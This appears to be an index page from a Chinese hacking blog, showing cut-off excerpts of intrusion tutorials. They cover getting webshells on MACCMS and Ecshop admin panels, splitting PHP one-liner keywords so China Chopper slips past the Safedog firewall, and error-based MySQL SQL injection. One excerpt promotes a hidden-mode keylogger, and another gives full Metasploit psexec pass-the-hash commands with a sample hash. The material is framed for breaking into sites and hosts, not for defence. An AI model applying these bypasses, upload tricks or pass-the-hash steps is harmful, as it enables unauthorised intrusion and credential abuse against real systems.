提高挖洞效率的一些工具

MACCMS PHP版突破安全狗后台拿webshell

• 条件：
• 1、电影站是maccms php版本的。
• 2、服务器安装了安全狗。
• 3、有后台账号密码。
• 
  
• 当然了首先第一步百度一下，有没有相关文章。发现了先前有大牛发了一个上传的漏洞测试失败，估计是官方已修复。
• 
  
• 进后台，发现可以编辑模板，如下图：
• 
  
• 
  
• 路径是：
• http://www. /admin/admin_templates.php?action=edit&file=../template/default/html/art.html
• 
  
• 然后IE里构造一下：
• http://www. ...

关于菜刀绕过安全狗V3.1版的一些资料

测试坏境  IIS6.0 + PHP + 安全狗IIS版V3.1

安全狗设置都是默认的。。没有经过任何更改。。。

因为本屌看过一点韩老师的PHP视频 ,所以就先从php一句话开始吧。。。。

传统php一句话

这个已经杀的不能再杀了。。。。

But

看出什么来了吗？？

很明显 狗狗是把POST当做关键字，只要我们把POST拆分一下。。狗狗一下子就乖了很多

看到这里我想神马变异一句话什么的都很容易写出了吧

这里就留

基于错误回显的SQL注入笔记

0x00 关于错误回显

　　　　用我自己的话来讲，基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上（当然在实际应用中得能回显在页面上，一般的网站都回避免这种情况，哈哈，要是能碰上你就偷着乐吧）。

0x01  用于错误回显的sql语句（下面的函数撸主只在mysql下试过也能成功，其他数据库有待考证，待有实例的时候会补充）

第一种：  基于 rand()  与  group by 的错误

　　　　首先看一下关于rand()函数与group by 在mysql中的错误报告，没错，我们就是要利用group by...

Ecshop后台拿shell方法总结

方法一：龙儿心发明的，版本未定，估计都行。

进入后台-系统设置-Flash播放器管理

可以上传任意文件。

[includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制，直接Type=Media 上传你的webshell，访问路径为http://target/images/upload/Media/xxx.php]

方法二：另外一种是利用ecshop后台的数据库备份功能

这里选择自定义备份，目的是使你备份出来的文件尽量的小，要是太大的话也很麻烦。

然后去前台留个言，内容是我们...

猥琐之老外的键盘记录器

描述

Kelogger 24 -是一个全功能的应用程序来记录击键。
它从所有应用程序记录信息包括浏览器、办公项目,IM,Skype,等等。
除了键盘记录功能,它使截图的活动窗口。
可以配置规则的截图和质量。
Kelogger 24可以隐藏的模式。 应用程序窗口被激活从按下热键隐藏模式。
Kelogger 24为家长和员工开发的控制。 禁止使用这个应用程序为间谍和非法目的。
Kelogger 24 -是一个开源项目。 Keylogger24可供下载的源代码

特性

• 键盘记录器


• 截图记录器


• 隐藏模式


• 剪贴...

使用Hash直接登录Windows

使用gethashes.exe 获取本地hash：
[cce]gethashes.exe $local[/cce]
使用msf中的psexec来hash登陆：
[cce]
use exploit/windows/smb/psexec
show options
set RHOST 192.168.1.9(靶机IP)
set SMBUser molok(获取的用户名)
set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537(获取的hash)
exploit
[/cce]
逛乌云...